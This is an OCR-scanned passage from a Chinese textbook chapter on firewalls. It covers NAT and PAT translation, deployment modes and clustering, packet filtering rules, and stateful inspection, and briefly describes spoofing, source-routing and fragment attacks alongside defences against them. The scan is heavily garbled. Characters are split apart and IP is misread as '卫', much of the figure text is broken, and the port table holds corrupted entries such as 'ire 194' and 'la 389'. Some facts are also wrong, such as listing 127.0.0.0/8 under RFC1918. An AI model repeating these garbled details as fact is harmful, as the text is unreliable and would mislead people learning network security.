下 ， 主 要 负责 IP 地 址 的 转换 和 映射 工作 ， 它 可 以 采用 NAT( 地 址 转换 ) 方 式 或 PAT( 端 口 转 
换 ) 方 式 将 内 网 的 私有 地 址 转换 为 公 网 地 址 ， 从 而 实现 私有 地 址 对 互联 网 主机 的 访问 。 

NAT 地 址 转换 主要 有 两 种 类 型 : 静态 转换 和 动态 转换 。 其 中 ， 静 态 转 换 是 一 种 最 简 
单 的 转换 方式 ， 它 在 NAT 表 中 为 每 一 个 需要 转换 的 内 部 地 址 映射 了 一 个 唯一 的 外 部 地 
址 ， 这 样 内 部 地 址 与 外 部 地 址 一 一 对 应 ， 如 图 7-10 所 示 。 每 当 内 部 节点 与 外 界 通信 时 ， 
内 部 地 址 就 会 转化 为 对 应 的 外 部 地 址 ， 由 于 服务 器 对 外 提供 服务 常 需要 固定 的 IP 地 址 ， 
因此 静态 转换 通常 用 于 服务 器 的 地 址 转换 ， 它 的 缺点 是 需要 占用 大 量 外 部 地 址 。 而 NAT 
动态 转换 是 将 可 用 的 外 部 地 址 集合 定义 成 一 个 NAT 池 ， 对 于 要 与 外 界 进行 通信 的 内 部 节 
点 ， 如 果 还 没有 建立 转换 上 映射， 防火墙 将 会 动态 的 从 NAT 池 中 选择 一 个 外 部 地 址 ， 通 过 
建立 映射 条 目 对 内 部 地 址 进行 转化 ， 这 样 每 个 转换 条 目 在 连接 建立 时 是 动态 建立 的 ， 而 在 
连接 终止 时 会 被 防火 墙 回收 。 因 此 NAT 的 动态 转换 增加 了 网 络 的 灵活 性 ， 当 它 用 于 大 量 
内 网 用 户 对 外 网 的 访问 时 ， 可 大 大 减少 对 外 网 地 址 资源 的 占用 ， 但 动态 NAT 由 于 每 次 地 
址 转换 都 是 动态 分 配 的 ， 因 此 同一 个 节点 在 不 同 连接 中 可 能 对 外 的 卫 地 址 也 是 不 同 的 ， 
这 就 会 使 一 些 业务 行为 复杂 化 。 
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HostB 
172.20.7.3 


图 7-10 采用 传统 NAT 技术 时 的 NAT 表 项 示意 图 


传统 NAT 技术 只 使 用 了 IP 地 址 的 转换 条 目 ， 我 们 称 为 基本 条 目 ， 为 了 进一步 节省 地 
址 空间 ， 现 在 的 NAT 技术 把 TCP/UDP 的 端口 号 也 加 入 进 转换 条 目 ， 这 样 包含 了 IP 地 址 
和 端口 号 的 转换 条 目 ， 我 们 称 为 扩展 条 目 ， 它 所 采用 的 技术 是 NAPT 技术 ， 也 称 PAT 技 
术 ， 即 地 址 端口 转换 技术 。PAT 技术 是 NAT 技术 的 一 种 变形 ， 它 可 以 使 多 个 内 部 节点 共 
享 一 个 外 部 地 址 ， 而 是 使 用 端口 号 来 区 分 NAT 表 项 中 的 转换 条 目 及 内 部 地 址 ， 如 图 7-11 


HostB 
172.20.7.3 


Internet 一 电 


: NAT table 
10.1.1.1 Protocol | Inside Local IP eee -= Outside Global 

一 -一 一 一 一 一 一 一 一 10,1.1,1 | Adkdress; Port JP Address: Port 

| ee | 
TCP 92,1 :172 


7-11 采用 PAT 技术 时 的 NAT 表 项 示意 图 


NAT 技术 缓解 了 Ipv4 地 址 匮乏 给 我 们 带 来 的 危机 ， 可 以 节约 地 址 空间 ， 使 网 络 规划 
更 灵活 。 但 是 它 也 对 网 络 应 用 带 来 了 一 定 的 影响 ， 一 方面 NAT 地 址 转换 会 增加 防火 墙 的 
CPU 负担 ， 增 加 数据 包 延 迟 ， 另 一 方面 ，NAT 技术 破坏 了 传统 协议 模型 中 的 端 到 端 连 
接 ， 隐 藏 了 端 到 端的 IP 地 址 ， 这 使 得 对 数据 包 路 径 的 跟踪 变 的 比较 困难 ， 不 利于 网 络 的 
管理 。 而 且 由 于 这 个 原因 ， 使 得 一 些 内 嵌 的 卫 地 址 在 应 用 中 会 产生 问题 ， 例 如 ICMP 协 
议 、FTP、NBT、SNMP、DNS 等 。 另 外 ， 如 果 使 用 IPSec 进行 加 密 时 ， 只 能 把 NAT 放 在 
受 保 护 的 VPN 内 部 ， 或 者 使 用 具有 NAT 功能 的 IPSec 设备 。 因 为 IPSec 规定 卫 地 址 不 能 
被 改变 。 如 果 改 变 了 卫 地址， 就 会 破坏 VPN 的 功能 。 如 果 确 实 需要 对 已 用 IPSec 加 密 的 
数据 进行 地 址 改变 ， 那 就 应 该 考虑 使 用 RSIP 技术 来 代替 了 。 
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4) ”混合 模式 

防火 墙 的 路 由 模式 和 透明 模式 在 不 同 的 网 络 环境 中 各 有 所 用 ， 在 使 用 时 由 用 户 根据 实 
际 情况 进行 选择 。 有 时 因为 网 络 的 特殊 环境 ， 常 常 出 现 路 由 模式 、 透 明 模式 和 NAT 模式 
并 存 于 网 络 中 的 情况 ， 称 为 防火 墙 的 混合 模式 。 此 时 ， 防 火 墙 部 分 接口 配置 了 JP 地 址 ， 
所 连 网 络 是 一 个 三 层 网 络 ， 而 另 一 部 分 接口 连接 的 是 二 层 网 络 ， 没 有 全 地 址 。 实 现 防火 
墙 的 混合 模式 ， 需 要 防火 墙 实现 多 工作 模式 自 适 应 技术 ， 在 这 种 模式 下 ， 防 火 墙 可 以 不 用 
进行 任何 切换 ， 就 可 以 同时 支持 路 由 、 透 明和 NAT 工作 模式 ， 提 高 了 防火 墙 部 署 的 灵 
活性 。 

2. 防火 墙 部 署 的 拓扑 类 型 


防火 墙 在 网 络 部 署 中 ， 要 考虑 部 署 的 成 本 、 安 全 性 、 管 理性 和 可 用 性 等 问题 ， 其 中 安 
全 性 和 管理 性 通常 取决 于 防火 墙 所 采用 的 技术 、 用 户 的 安全 策略 及 配置 是 否 合理 ， 而 部 署 
的 成 本 和 可 用 性 常 取决 于 防火 墙 在 实际 网 络 中 所 采用 的 拓扑 类 型 。 根 据 不 同 网 络 环境 的 实 
际 需求 ， 防 火 墙 在 网 络 中 部 署 时 常 采 用 两 种 方式 ， 单机 部 署 和 集群 部 署 。 

1) ”防火 墙 的 单机 部 署 类 型 

顾名思义 ， 防 火 墙 的 单机 部 署 就 是 在 两 个 网 络 之 间 部 署 一 台 防火 墙 ， 它 的 优点 是 安全 
成 本 低 ， 配 置 和 管理 简单 ， 其 缺点 也 非常 明显 ， 一 方面 它 会 成 为 整个 网 络 的 一 个 瓶颈 ， 另 
一 方面 它 也 是 整个 网 络 中 的 一 个 单 点 故障 。 防 火 墙 的 单机 部 署 又 分 为 单机 单 出 口 拓扑 类 型 
和 单机 多 出 口 拓扑 类 型 两 种 。 

目前 ， 中 小 型 网 络 一 般 都 采用 一 个 互联 网 出 口 接 入 Intemet， 而 一 些 大 型 网 络 常常 会 
采用 两 个 或 更 多 的 互联 网 出 口 接 入 Intemet 或 者 一 些 其 他 公共 网 络 ， 例 如 一 般 大 中 专 院 校 
都 会 采用 两 条 链 路 ， 一 个 用 于 接 入 中 国教 育 科研 网 ， 另 一 个 用 于 接 入 Intemet 网 络 。 面 对 
这 种 多 出 口 网 络 ， 一 般 网 络 会 采用 路 由 器 实现 多 个 外 部 网 络 的 接 入 ， 因 为 路 由 器 比 防 火 墙 
的 接口 类 型 更 加 丰富 ， 更 具 扩展 性 。 而 在 路 由 器 之 下 常常 会 部 署 一 台 或 两 台 防 火 墙 来 隔离 
内 外 网 ， 从 而 保护 内 网 安全 。 采 用 单 台 防火 墙 部 署 时 常见 的 两 个 方式 就 是 单 出 口 类 型 和 多 
出 口 类 型 ， 单 出 口 类 型 对 应 一 台 路 由 器 ， 由 一 台 路 由 器 实现 多 出 口 网 络 的 互 连 ， 它 的 优点 
是 成 本 低 、 易 于 管理 ， 同 时 便于 实现 链 路 的 负载 和 互 备 ， 但 缺点 是 路 由 器 负荷 过 大 ， 同 时 
路 由 器 本 身 又 会 成 为 一 个 单 点 故障 。 而 单机 防火 墙 部 署 的 多 出 口 类 型 对 应 多 台 路 由 器 ， 它 
的 优点 是 路 由 器 负荷 得 到 分 流 ， 易 于 实现 设备 及 链 路 的 互 备 和 负载 均衡 ， 缺 点 是 成 本 高 、 
管理 麻烦 。 图 7-12 描述 了 防火 墙 单机 部 署 的 这 两 种 类 型 。 

当 防 火 墙 采用 单机 单 出 口 部 署 方式 时 ， 防 火 墙 既 可 采用 透明 模式 ， 又 可 采用 路 由 工作 
方式 ， 其 拓扑 和 配置 管理 比较 简单 、 灵 活 ， 当 使 用 路 由 模式 时 其 对 外 路 由 仅 需 要 使 用 一 个 
默认 路 由 指向 它 上 行 的 路 由 器 地 址 即 可 。 

当 防 火 墙 采用 单机 多 出 口 部 署 方 式 时 ， 防 火 墙 一 般 都 是 采用 路 由 模式 或 混合 模式 ， 并 
且 其 路 由 配置 要 比 单机 单 出 口 方式 要 复杂 。 

2) “防火墙 的 集群 部 署 类 型 

防火 墙 的 单机 部 署 模式 最 大 的 优点 是 安全 成 本 低 ， 但 是 由 于 存在 单 点 故障 ， 因 此 在 一 
些 对 网 络 可 靠 性 要 求 高 的 网 络 中 会 存在 较 大 的 问题 。 这 时 我 们 可 以 采用 防火 墙 的 集群 部 署 
来 解决 这 一 问题 ， 提 高 边界 网 络 的 可 靠 性 。 从 可 靠 性 角度 来 讲 ， 防 火 墙 的 集群 部 署 分 为 设 
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备 元 余 和 链 路 元 余 两 种 方式 ， 如 图 7-13 所 示 ; 从 可 用 性 角度 来 讲 ， 防 火 墙 的 集群 部 署 分 
为 主 从 模式 和 双 主 模式 两 种 方式 。 


内 网 用 户 群 
(a) 单机 单 出 口 部 署 方 式 (b) 单机 多 出 口 部 署 方式 


7-12 ”防火 墙 的 单机 部 署 示意 图 


内 网 用 户 群 内 网 用 户 群 
(a) 防火 墙 集群 的 设备 宛 余 模式 (b) 防火 墙 集群 的 链 路 元 余 模式 


图 7-13 防火墙 的 集群 部 署 示意 图 


采用 防火 墙 集群 部 署 时 ， 以 两 台 防 火 墙 为 例 总 共 需 要 为 防火 墙 配置 3 套 卫 地 址 ， 其 
中 每 个 防火 墙 有 一 套 自己 的 真实 卫 地 址 ， 另 外 两 个 防火 墙 还 需要 共享 一 套 虚拟 卫 地 址 ， 
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而 对 于 防火 墙 集群 的 周边 设备 来 讲 ， 防 火 墙 的 可 见地 址 就 是 这 套 虚拟 的 瑟 地 址 。 从 图 7-13 
中 可 以 看 出 ， 链 路 元 余 方式 比 设备 元 余 方式 更 加 具有 可 靠 性 ， 但 成 本 也 更 高 。 

防火 墙 集群 部 署 通常 有 两 种 技术 实现 方式 : 一 种 是 使 用 心跳 机 制 ， 另 一 种 是 使 用 集群 
Cluster 机 制 。 

其 中 心跳 机 制 实现 起 来 非常 简单 ， 它 通过 IP 地 址 做 心跳 检测 时 ， 主 备 机 会 通过 此 心 
跳 路 径 周 期 性 地 发 出 相互 检测 的 心跳 测试 包 ， 如 图 7-14 所 示 。 


心跳 检测 


AV 


7-14 ”防火 墙 集群 的 心跳 检测 示意 图 


如 果 此 时 主机 出 现 故 障 ， 备 机 就 会 在 连续 丢失 一 定数 量 的 心跳 包 后 认为 主机 已 经 宕 
机 ， 此 时 备 机 会 自动 检测 是 否 有 第 二 种 心跳 ， 如 果 还 没有 ， 它 就 会 根据 已 设 定 的 规则 自动 
启动 备 机 的 相关 服务 ， 完 成 设备 的 切换 。 心 跳 机 制 虽 然 实现 简单 ， 但 切换 过 程 较 慢 ， 可 扩 
展 性 差 ， 比 较 适 合 双 机 之 间 的 集群 部 署 。 

而 集群 管理 的 Cluster 方式 根据 防火 墙 在 集群 中 所 处 的 地 位 和 功能 不 同 ， 可 将 集群 中 
的 防火 墙 设备 分 为 以 下 三 种 角色 : 管理 设备 、 成 员 设 备 和 候选 设备 ， 如 图 7-15 所 示 。 管 
理 设备 是 集群 中 对 整个 集群 管理 发 挥 接口 作用 的 设备 ， 也 是 集群 中 对 外 提供 IP 地 址 的 设 
备 ， 每 个 集群 必须 指定 至 少 一 个 管理 设备 ， 它 对 集群 中 的 其 他 设备 进行 配置 、 管 理 和 监 
控 ， 通 过 收集 相关 信息 来 发 现 和 确定 其 他 候选 设备 ;成 员 设备 指 的 是 在 集群 中 处 于 被 管理 
状态 的 设备 ， 即 从 机 ; 而 候选 设备 是 指 还 没有 加 入 任何 集群 但 已 具备 加 入 集群 的 能 力 ， 能 
够 成 为 集群 成 员 的 设备 ， 它 和 成 员 设 备 的 区 别 在 于 : 候选 设备 的 拓扑 信息 已 被 集群 收集 但 
还 尚未 加 入 到 集群 中 。 


0 > 羽 


Memberl 
创建 集群 加 入 集群 
ee 删除 集群 从 集群 中 删除 

Member2 Administrator Candidate Member 


7-15 ”防火 墙 集群 的 Cluster 机 制 示意 图 
一 个 Cluster 通常 凭借 邻居 发 现 协议 、 拓 扑 发 现 协议 和 集群 管理 协议 来 维护 一 个 集群 
的 正常 运行 ， 其 工作 过 程 包括 拓扑 收集 以 及 集群 的 建立 和 维护 。 所 有 设备 可 以 通过 邻居 发 
现 协 议 来 获取 其 直接 相 邻 设 备 的 信息 ， 包 括 主 机 名 、MAC 地 址 和 端口 信息 等 ， 而 集群 中 
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的 主 设备 即 管理 机 器 可 以 通过 拓扑 发 现 协议 收集 指定 跳 数 范围 内 的 设备 信息 以 及 各 个 设备 
的 连接 信息 ， 从 收集 到 的 拓扑 信息 中 确定 集群 的 候选 设备 ， 而 集群 管理 协议 则 负责 整个 集 
群 成 员 的 加 入 、 删 除 ， 维 护 集群 内 设备 通信 等 任务 。 

前 面 我 们 说 过 ， 防 火 墙 的 高 可 用 性 集群 有 两 种 部 署 模式 : 主 从 模式 和 双 主 模式 。 主 从 
模式 需要 使 用 两 台 或 多 台 设 备 ， 其 中 一 台 作为 防火 墙 ， 所 有 的 数据 流 都 通过 它 进 出 网 络 ， 
集群 中 其 他 的 防火 墙 作为 备用 防火 墙 ， 不 参与 网 络 活动 ， 仅 等 待 主 防火 墙 失效 。 另 外 ， 某 
些 防 火 墙 设备 的 集群 技术 是 支持 备用 防火 墙 可 以 共享 主 防火 墙 的 连接 状态 信息 的 ， 此 时 用 
户 已 存在 的 连接 就 不 会 断 开 。 而 双 主 模式 常用 于 网 络 流量 的 负载 均衡 和 设备 的 热 备 ， 即 集 
群 中 存在 两 个 主 防火 墙 ， 平 时 两 台 主 防火 墙 实现 流量 的 负载 均衡 ， 而 当 一 个 失效 时 ， 另 一 
个 主 防火 墙 将 自动 接管 该 失效 设备 的 所 有 流量 ， 因 此 更 具 实用 性 。 防 火 墙 集群 的 失效 转换 
机 制 依赖 于 各 个 厂商 的 设计 ， 所 以 当 用 户 实际 部 署 防火 墙 集群 时 ， 应 认真 考虑 所 用 设备 的 
类 型 和 集群 管理 方式 。 


7.3 ”防火墙 的 主要 应 用 


当今 防火 墙 已 经 成 为 任何 完善 的 网 络 安全 系统 不 可 缺少 的 重要 组 成 部 分 ， 而 且 随 着 防 
火 墙 技术 的 不 断 发 展 ， 防 火 墙 的 功能 和 应 用 也 越 来 越 完 善 ， 但 从 实现 层次 上 仍 以 包 过 滤 技 
术 和 应 用 代理 网 关 技 术 为 核心 ， 本 节 我 们 将 主要 学 习 一 下 防火 墙 的 主要 应 用 技术 。 


7.3.1 应 用 包 过 滤 技 术 实现 访问 控制 规则 


包 过 滤 技 术 是 防火 墙 最 基本 的 实现 技术 ， 也 是 防火 墙 最 早 采用 的 技术 之 一 ， 其 原理 总 
结 为 一 句 话 就 是 监视 并 过 滤 网 络 上 流入 流出 的 数据 包 ， 并 拒绝 发 送 那些 可 疑 的 包 。 


1. 数据 包 的 构造 


数据 通过 通信 子 网 传输 时 可 以 有 报 文 (Message) 与 分 组 (Packet) 两 种 方式 。 其 中 ， 报 文 
传输 不 管 发 送 数据 的 长 度 是 多 少 ， 都 把 它 当 作 一 个 逻辑 单元 发 送 ， 而 分 组 传输 方式 则 限制 
一 次 传输 数据 的 最 大 长 度 ， 如 果 传输 数据 超过 规定 的 最 大 长 度 ， 发 送 节点 就 将 它 分 成 多 个 
分 组 来 发 送 。 我 们 在 有 关 计算 机 网 络 的 课程 中 学 习 过 OSI 七 层 模型 ， 也 知道 数据 在 传输 过 
程 中 ， 所 经 协议 的 每 一 层 都 要 对 数据 进行 封装 或 解 装 ， 每 一 层 的 数据 封装 或 解 装 都 是 由 控 
制 信息 加 上 要 传输 的 数据 ， 我 们 把 每 层 传输 的 数据 格式 称 为 PDU(Protocol Data Unit， 协 议 
数据 单元 )， 如 图 7-16 所 示 。 这 样 看 起 来 好 像 是 对 方 相应 层 直接 发 送 来 的 信息 ， 但 实际 上 
相应 层 之 间 的 通信 是 虚拟 通信 。 这 个 过 程 就 像 邮 政信 件 的 传递 、 加 邮 袋 、 上 邮 车 等 ， 在 各 
个 邮递 环节 加 封 、 传 递 ， 收 件 时 再 层 层 去 掉 封装 。 


N 层 数据 
PDU(N) |Data 
N 层 数据 
FE CI 层 ] ou 全 IData 


图 7-16 协议 数据 单元 PDU 示意 图 
接 下 来 通过 图 7-17 所 示 的 数据 包 封装 过 程 来 看 一 下 数据 是 如 何在 网 络 上 传输 的 。 
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PDU 


Segment 


Packet 


Frame 


Bits 


7-17 ”数据 包 封装 过 程 示意 图 


如 图 7-17 所 示 ， 这 个 过 程 可 简要 概括 为 以 下 步骤 : 

e@ 首先 在 源 主 机 上 应 用 层 将 一 串 字 节 流传 给 传输 层 。 

e@ “传输 层 将 字 节 流 分 成 TCP 段 ， 加 上 TCP 包头 交 给 互联 网 络 (IP) 层 。 

@ IP 层 生成 一 个 包 ， 将 TCP 段 放 入 其 数据 域 ， 并 加 上 源 和 目的 主机 的 地 址 ， 把 卫 
包 交 给 数据 链 路 层 ， 图 7-18 给 出 了 卫 数据 包 格 式 的 示意 图 。 


目的 外 地址 
选项 


图 7-18 ”IP 数据 包 格 式 示意 图 


数据 链 路 层 在 其 帧 的 数据 部 分 装 IP 包 ， 发 往 目 的 主机 或 路 由 器 。 
在 目的 主机 ， 数 据 链 路 层 将 数据 链 路 层 帧 头 去 掉 ， 将 人 P 包 交 给 互联 网 层 。 
卫 层 检查 瑟 包头 ， 如 果 包 头 中 的 校 验 和 与 计算 出 来 的 不 一 致 ， 则 丢弃 该 包 。 
如 果 校 验 和 一 致 ，IP 层 去 掉 IP 头 ， 将 TCP 段 交 给 TCP 层 ，TCP 层 检 查 顺 序号 
来 判断 是 否 为 正确 的 TCP 段 。 
@ TCP 层 为 TCP 包头 计算 TCP 头 和 数据 。 如 果 不 对 ，TCP 层 丢 弃 这 个 包 ; 若 对 ， 
则 向 源 主机 发 送 确认 。 
e 在 目的 主机 TCP 层 去 掉 TCP 头 ， 根 据 套 接 字 信息 将 字 节 流传 给 应 用 程序 ， 于 是 
目的 主机 收 到 了 源 主机 发 来 的 字 节 流 ， 就 像 直 接 从 源 主机 发 来 的 一 样 。 
由 于 数据 包 的 包头 包含 了 各 层 依 次 附加 上 的 协议 信息 和 控制 信息 ， 因 此 数据 包 过 滤 技 
术 主 要 就 是 根据 这 个 包头 包含 的 信息 来 识别 、 检 测 和 操作 这 些 数据 包 的 。 
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2. 数据 包 的 过 滤 技术 


包 过 滤 技术 可 以 允许 或 不 允许 某 些 包 在 网 络 上 传递 ， 传 统 的 包 过 滤 技 术 主要 根据 人 Pp 
数据 包 的 以 下 信息 作为 判断 数据 包 是 否 可 以 通过 网 络 的 依据 : 

@ 将 目的 地 址 作为 判断 依据 。 
将 源 地 址 作为 判断 依据 。 
将 传送 协议 IP、ICMP、TCP、UDP 等 ) 作 为 判断 依据 。 
将 TCP/UDP 源 端口 号 作为 判断 依据 。 
将 TCP/UDP 目的 端口 号 作为 判断 依据 。 
将 ICMP 的 报 文 类 型 域 和 代码 域 作为 判断 依据 。 
将 TCP 报 文中 的 SYN、ACK 等 标志 位 作为 判断 依据 。 

防火 墙 为 所 有 进出 网 络 的 数据 流 提 供 了 一 个 有 用 的 阻塞 点 ， 包 过 滤 技 术 会 根据 这 些 判 
断 规则 逐一 审查 数据 包 ， 通 过 与 过 滤 规 则 相 匹配 来 判断 对 这 个 数据 包 所 应 采取 的 操作 ， 例 
如 如 果 找 到 一 个 规则 匹配 ， 则 允许 数据 包 通 过 ; 如 果 没 有 对 应 的 匹配 规则 ， 则 丢弃 该 数 
据 包 。 

因此 读者 在 应 用 包 过 滤 技 术 时 制定 一 个 完善 的 安全 过 滤 规 则 是 非常 重要 的 ， 通 常 这 个 
过 滤 规 则 是 以 访问 控制 列表 或 图 形 管理 界面 中 的 某 种 表格 形式 来 表示 的 ， 其 中 包括 以 某 种 
次 序 排列 的 过 滤 条 件 和 动作 序列 。 每 当 防 火 墙 收 到 一 个 数据 包 时 ， 则 按照 从 前 至 后 的 顺序 
与 条 件 列 表 中 每 行 条 件 进行 比较 ， 直 到 满足 某 一 条 件 ， 然 后 执行 相应 的 动作 (转发 或 
舍弃 )。 

在 制定 包 过 滤 的 过 滤 条 件 时 ， 我 们 要 认真 分 析 每 项 条 件 ， 合 理 选 择 以 上 列 出 的 判断 条 
件 ， 在 边界 防火 墙 上 配置 过 滤 条 件 还 需要 遵循 以 下 过 滤 规 则 : 

@ ”对 于 任何 进入 内 部 网 络 的 数据 包 ， 不 能 把 网 络 内 部 的 地 址 作为 源 地 址 。 
对 于 任何 进入 内 部 网 络 的 数据 包 ， 必 须 把 网 络 内 部 地 址 作为 目的 地 址 。 
对 于 任何 离开 内 部 网 络 的 数据 包 ， 必 须 把 网 络 内 部 的 地 址 作为 源 地 址 。 
对 于 任何 离开 内 部 网 络 的 数据 包 ， 不 能 把 网 络 内 部 的 地 址 作为 目的 地 址 。 
对 于 任何 进入 或 离开 内 部 网 络 的 数据 包 ， 一 般 不 能 把 一 个 私有 地 址 (Private 
Address) 或 在 RFC1918 中 127.0.0.0/8 的 地 址 作为 源 或 目的 地 址 ， 但 也 有 例外 。 
阻塞 任意 源 路 由 包 或 任何 设置 了 IP 选项 的 包 。 
e@ 保留 、DHCP 自动 配置 和 多 播 地 址 也 需要 被 阻塞 。 例 如 0.0.0.0/8 、 

169.254.0.0/16 、192.0.2.0/24 、224.0.0.0/4 、240.0.0.0/4。 
表 7-1 列 出 了 一 些 常见 应 用 使 用 的 传输 层 协议 类 型 和 端口 号 。 


表 7-1 常见 应 用 的 协议 类 型 和 端口 号 


服务 名 称 说 明 
fip-data FTP 数据 端口 
fip FTP 监听 端口 
telnet Telnet 监听 端口 


发 送 邮件 端口 
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续 表 

服务 名 称 端口 号 说 明 
time 3 timserver 
time 37 timserver 
domain 53 DNS 
domain 53 DNS 
gopher 70 gopher 查询 
http 80 WWW, 
pop3 110 接收 邮件 端口 
nntp 119 新 闻 组 ，usernet 
netbios-ns, 137 NETBIOS 名 称 服务 
netbios-ns 137 NETBIOS 名 称 服务 
netbios-dem 138 [up | NETBIOS 数据 报 服务 
netbios-ssn 139 NETBIOS Session 服务 
snmp 161 | upp | SNMP 
snmptrap 162 [upp | SNMP tral 
ire 194 IRC 网 络 聊天 服务 
la 389 轻型 目录 服务 协议 
https 443 SSL 加 密 
https 443 [up | SSL 加 密 


采用 包 过 滤 技 术 时 ， 有 些 类 型 的 攻击 很 难 用 基本 包头 信息 加 以 鉴别 ， 防 火 墙 可 以 通过 
为 过 滤 规 则 增加 一 些 信息 来 识别 这 些 攻 击 ， 而 一 般 这 些 信息 可 以 通过 研究 路 由 表 、 检 查 特 
定 的 耳 选项 和 校 验 特殊 的 片段 偏 移 等 方式 获取 ， 例 如 : 

【 例 7-1】 源 卫 地 址 欺骗 攻击 

攻击 方式 ， 入 侵 者 伪装 成 内 网 地 址 向 网 络 发 送信 息 。 

应 对 措施 : 如 果 这些 信息 包 到 达 防 火 墙 的 外 部 接口 ， 则 丢弃 每 个 含有 内 网 源 IP 地 址 
的 信息 包 ， 就 可 以 挫败 这 种 源 欺骗 攻击 。 

【 例 7-2】 源 路 由 攻击 

攻击 方式 ， 源 站 指定 了 一 个 信息 包 穿越 Intemet 时 应 采取 的 路 径 ， 这 类 攻击 企图 绕 过 
安全 措施 ， 并 使 信息 包 沿 一 条 意外 (疏漏 ) 的 路 径 到 达 目 的 地 。 

应 对 措施 ;防火墙 可 以 通过 舍弃 所 有 包含 这 类 源 路 由 选项 的 信息 包 方式 ， 来 挫败 这 类 
攻击 。 

【 例 7-3】 了 碎片 攻击 

攻击 方式 ， 入 侵 者 利用 IP 残片 特性 生成 一 个 极 小 的 片段 并 将 TCP 报头 信息 肢解 成 一 
个 分 离 的 信息 包 片段 来 达到 欺骗 防火 墙 的 目的 。 

应 对 措施 :防火墙 可 以 采取 舍弃 所 有 协议 类 型 为 TCP、IP 片段 偏 移 值 等 于 1 的 信息 
包 ， 即 可 挫败 这 类 残片 的 攻击 。 
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【 例 7-4】 TCP 欺骗 

攻击 方式 ， 攻击 者 可 以 通过 发 送 IP 源 地 址 属于 另 一 台 机 器 的 卫 数据 报 来 实施 欺骗 ， 
而 那 台 具 有 该 合法 人 P 源 地 址 的 机 器 也 在 运行 ， 攻 击 者 并 不 在 意 是 否 得 到 这 些 数据 报 的 答 
复 ， 其 他 机 器 将 接受 这 些 伪 造 的 数据 报 ， 认 为 他 们 来 自 报 文 人 P 源 地 址 合法 拥有 者 。 然 后 
执行 并 不 是 由 真正 合法 机 器 的 用 户 发 出 的 请 求 。 这 就 是 所 谓 的 TCP 欺骗 。 

应 对 措施 : 防火 墙 可 以 采用 限制 SYN 包 通 过 方向 的 技术 ， 可 以 限制 TCP 连接 的 发 起 
方 只 能 是 内 部 子 网 ， 而 外 部 发 起 的 到 内 部 子 网 的 连接 将 不 能 建立 ， 从 而 保护 内 部 子 网 内 的 
主机 。 


7.3.2 ”应 用 状态 检测 技术 实现 动态 包 过 滤 


传统 包 过 滤 技 术 依靠 事先 设 定好 的 访问 控制 列表 (简称 ACL)， 对 流 经 防火 墙 的 每 个 数 
据 包 进行 审查 ， 通 过 和 访问 控制 列表 的 匹配 检查 ， 根 据 对 比 的 结果 决定 防火 墙 是 允许 还 是 
拒绝 数据 包 的 访问 ， 从 而 实现 对 数据 包 的 过 滤 功 能 。 这 是 一 种 静态 包 过 滤 技术 ， 包 过 滤 防 
火 墙 处 理 每 个 包 的 行为 是 孤立 的 ， 它 并 不 知道 当前 处 理 的 包 和 以 前 处 理 的 包 之 间 的 联系 ， 
因此 通过 伪造 数据 包 可 以 轻易 欺骗 防火 墙 。 为 此 防火 墙 厂 商 提出 了 基于 状态 检测 的 动态 包 
过 滤 的 技术 ， 动 态 包 过 滤 技 术 除了 拥有 静态 包 过 滤 技术 的 所 有 特征 外 ， 还 可 以 对 任何 网 络 
连接 和 会 话 的 当前 状态 进行 分 析 和 监控 ， 并 在 此 基础 上 动态 添加 相应 的 过 滤 规则 。 


1. 状态 检测 技术 的 工作 原理 


状态 检测 技术 使 用 一 种 机 制 来 保持 并 跟踪 会 话 连接 的 状态 ， 在 防火 墙 建立 连接 进行 会 
话 处 理 的 过 程 中 ， 依 据 会 话 表 的 信息 动态 增加 、 修 改 和 删除 过 滤 规 则 ， 决 定数 据 流 的 转发 
与 丢弃 行为 。 

基于 状态 检测 的 防火 墙 会 监控 一 个 连接 会 话 的 建立 和 对 话 过 程 ， 当 它 接收 到 一 个 包含 
TCP 或 UDP 连接 请 求 的 数据 包 时 ， 会 首先 采用 静态 包 过 滤 的 方式 检查 预 设 的 安全 策略 ， 
如 果 允 许 建立 连接 ， 则 将 该 数据 包 中 连接 建立 的 信息 记录 到 一 个 基于 状态 的 会 话 表 中 ， 该 
会 话 表 包 含 了 该 连接 的 源 卫 地 址 、 目 的 IP 地 址 、 端 口 、TCP 序列 号 信息 ， 以 及 和 该 会 话 
有 关 的 标志 信息 。 基 于 状态 的 会 话 表 基 于 这 些 信息 建立 了 一 个 连接 对 象 后 ， 会 将 后 续 数据 
包 和 会 话 表 中 的 信息 进行 比较 。 如 果 会 话 在 状态 表 内 ， 而 且 该 数据 包 是 会 话 的 一 部 分 ， 该 
数据 包 就 被 接受 。 如 果 不 是 会 话 的 一 部 分 ， 该 数据 包 会 被 丢弃 。 这 种 方式 提高 了 系统 的 性 
能 ， 因 为 并 不 是 每 一 个 数据 包 都 需要 像 静 态 包 过 滤 技 术 那 样 和 规则 库 进行 比较 ， 只 有 在 带 
有 SYN 标志 的 数据 包 到 来 时 ， 才 和 静态 规则 库 进 行 比较 ， 而 其 他 数据 包 只 需要 和 状态 会 
话 表 进 行 比 较 。 

图 7-19 描述 了 TCP 连接 时 采用 的 三 次 握手 机 制 ， 假 设 主机 A 和 B 之 间 存 在 一 个 状态 
检测 防火 墙 时 ， 当 主机 A 发 送 一 个 TCP 连接 请 求 时 ， 该 请 求 数 据 包 的 标志 字段 SYN=1、 
ACK=0， 并 携带 一 个 发 送 序号 ， 防 火 墙 会 对 该 数据 包 进 行 安全 策略 检查 ， 如 果 符 合 连接 
要 求 ， 就 允许 该 数据 包 通 过 ， 并 记录 在 会 话 表 中 。 主 机 B 如 果 接 收 到 该 请 求 包 ， 并 返回 
一 个 ack 包 时 ， 这 个 返回 确认 包 的 标识 字段 中 SYN=1、ACK=1， 并 携带 一 个 确认 序号 ， 
防火 墙 会 根据 这 些 信 息 与 会 话 表 中 的 连接 请 求 进行 对 比 ， 如 果 防 火 墙 确认 这 个 应 答 包 与 原 
来 的 请 求 包 同属 一 个 会 话 时 ， 就 允许 该 应 答 包 的 通过 ， 否 则 拒绝 掉 该 应 答 包 。 
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EE 机 A E 机 B 


图 7-19 TCP 连接 建立 时 采用 的 三 次 握手 机 制 


对 比 包 过 滤 防 火 墙 ， 状 态 防火 墙 利用 会 话 表 保持 对 连接 状态 的 跟踪 : 连接 是 否 处 于 初 
始 化 ， 数 据 传 输 或 终止 状态 。 状 态 防火 墙 将 进出 网 络 的 包 当 成 一 个 个 的 事件 来 处 理 ， 而 不 
